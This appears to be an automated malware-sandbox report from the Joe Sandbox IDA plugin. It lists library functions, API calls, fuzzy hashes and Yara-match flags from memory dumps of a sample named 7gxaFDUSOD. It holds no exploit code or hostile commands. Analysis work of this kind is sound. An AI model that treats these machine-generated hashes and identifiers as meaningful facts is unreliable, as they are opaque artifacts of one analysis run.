Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 024AFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: a3147bb91cd1a6b519d6c0c9a95b65df1d0121d9278bc457663a3614d2c08a48
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: CB11D632605125BFDB216F778C5896B7E6DFF96B61B110A2BFC15C7240DB318845CAB0

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 024AA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024AA331: _free.LIBCMT ref: 024AA35A

_free.LIBCMT ref: 024AA638

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA643
_free.LIBCMT ref: 024AA64E
_free.LIBCMT ref: 024AA6A2
_free.LIBCMT ref: 024AA6AD
_free.LIBCMT ref: 024AA6B8
_free.LIBCMT ref: 024AA6C3

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 90cb78883c5bddc800448d2ed1f22daa0a4e3ce3442c1cc19a09dbb4cb2cb69a
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 95115471644B14AEDE30BB73CC65FCF7BAEDF10740F40082EA399AA150E6A5B5148F60

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 02482659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02480DA0,?,?,?,00000000), ref: 02482667
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02480DA0,?,?,?,00000000), ref: 0248266D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02480DA0,?,?,?,00000000), ref: 0248269A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02480DA0,?,?,?,00000000), ref: 024826A4
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02480DA0,?,?,?,00000000), ref: 024826B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024826CC
__CxxThrowException@8.LIBVCRUNTIME ref: 024826DA

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 8dc18062fd9b7cdba8f2f580983486f902d54a21e93f80d3fddfda5678792448
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: F001A735511155ABD720FF66EC48FAF3B68AF42F52B50042BF815F2160DBA4D9048AA8

Function 024824A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
GetProcAddress.KERNEL32(00000000), ref: 02482507
GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
__CxxThrowException@8.LIBVCRUNTIME ref: 02482552

Strings

kernel32.dll, xrefs: 024824B0, 024824B5, 024824FA

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 6321cb032b3ac6266bcb91948c46b14e9a90c03f5cc25f99a1529d2fb501224a
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: E6F086759103503FB7117B75AD9991F3FEDDD46A22310062BF811E2291EBB585018558

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::eofbit set, xrefs: 0040C649
F(@, xrefs: 0040C651
F(@, xrefs: 0040C61B
ios_base::failbit set, xrefs: 0040C644

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 024A239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024A25EC,00000001,00000001,?), ref: 024A23F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024A25EC,00000001,00000001,?,?,?,?), ref: 024A247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024A2575
__freea.LIBCMT ref: 024A2582

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

__freea.LIBCMT ref: 024A258B
__freea.LIBCMT ref: 024A25B0

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: 40e7b135655f72d68db524e9ecd5f702624e90b039579bb94eea031907e1d748
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: CA510472A00216ABDB29CF64CC70EBF77AAFB64714F154A2AFC04D6240DBB4DD41EA50

Function 0249E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0249E445
__cftoe.LIBCMT ref: 0249E477

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: b09589567857bce42739b3ca8f4f7854c34ce075a3fd7c49df6bd92b9c8ab05f
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 8851E732A00205ABDF24DFA98C44BAF7FA9EF49774F14426FE81596281EB31D9418A64

Function 0249302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02493051

Part of subcall function 02488AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02488ABD

SafeSQueue.LIBCONCRT ref: 0249306A
Concurrency::location::_Assign.LIBCMT ref: 0249312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249314B
__CxxThrowException@8.LIBVCRUNTIME ref: 02493159

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: f17f68f332ad765b17bc766c602b2384a19cf259f4d76f71caa23b54ebd08521
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 9B31FD31A00A119FCF25EF69C884AAEBFB1EF45710F00859ED80A8B291DB70E845CFC0

Function 02498F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 02498F77
FindMITargetTypeInstance.LIBVCRUNTIME ref: 02498F90
FindVITargetTypeInstance.LIBVCRUNTIME ref: 02498F97
PMDtoOffset.LIBCMT ref: 02498FB6

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction ID: 729d71e27979b886033b59e8f5d03f53e6bf73ada97ae8130986aade6118ef52
Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction Fuzzy Hash: 7F2127726042049FCF14DF6DD845B6E7FA6EB46754B14821FE91293284E731E501CA90

Function 02475437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0247544B
__Mtx_init.LIBCPMT ref: 02475471
std::_Cnd_initX.LIBCPMT ref: 02475494
__Thrd_start.LIBCPMT ref: 024754B9
std::_Cnd_waitX.LIBCPMT ref: 024754D9
std::_Cnd_initX.LIBCPMT ref: 02475506

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 3533dc5d6fe9fe7f8d82f7bc90c6bf1722336b93d829ce2b177027cd31e7d937
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: EE218071C14248AADF15EBB9D844BDEB7F9AF08315F24402FE524B7280DB749A448E75

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,412360F1), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,412360F1), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02499041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 0249904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0249905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02499076
SetLastError.KERNEL32(00000000,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 024990C8

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 79e7b528f51af78aa9cb549d269dbed359ca619351dc98132f4f19895471d8bc
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 3201A7322097216EBF242BB6BC88A6B2F55EB06776B30033FF530453E1EF1288555D99

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 02474FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02474FCA
int.LIBCPMT ref: 02474FE1

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 02474FEA
std::_Facet_Register.LIBCPMT ref: 0247501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02475031
__CxxThrowException@8.LIBVCRUNTIME ref: 0247504F

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: c6852b834db11fb5e4047f026c8ffd8bac5ebc5a9f69090eb6e9b8e97eec28b3
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: 3E11AC319002289BCB25EBA5D844AEE77B6AF04714F54055FE832AB290DB749A068FE0

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
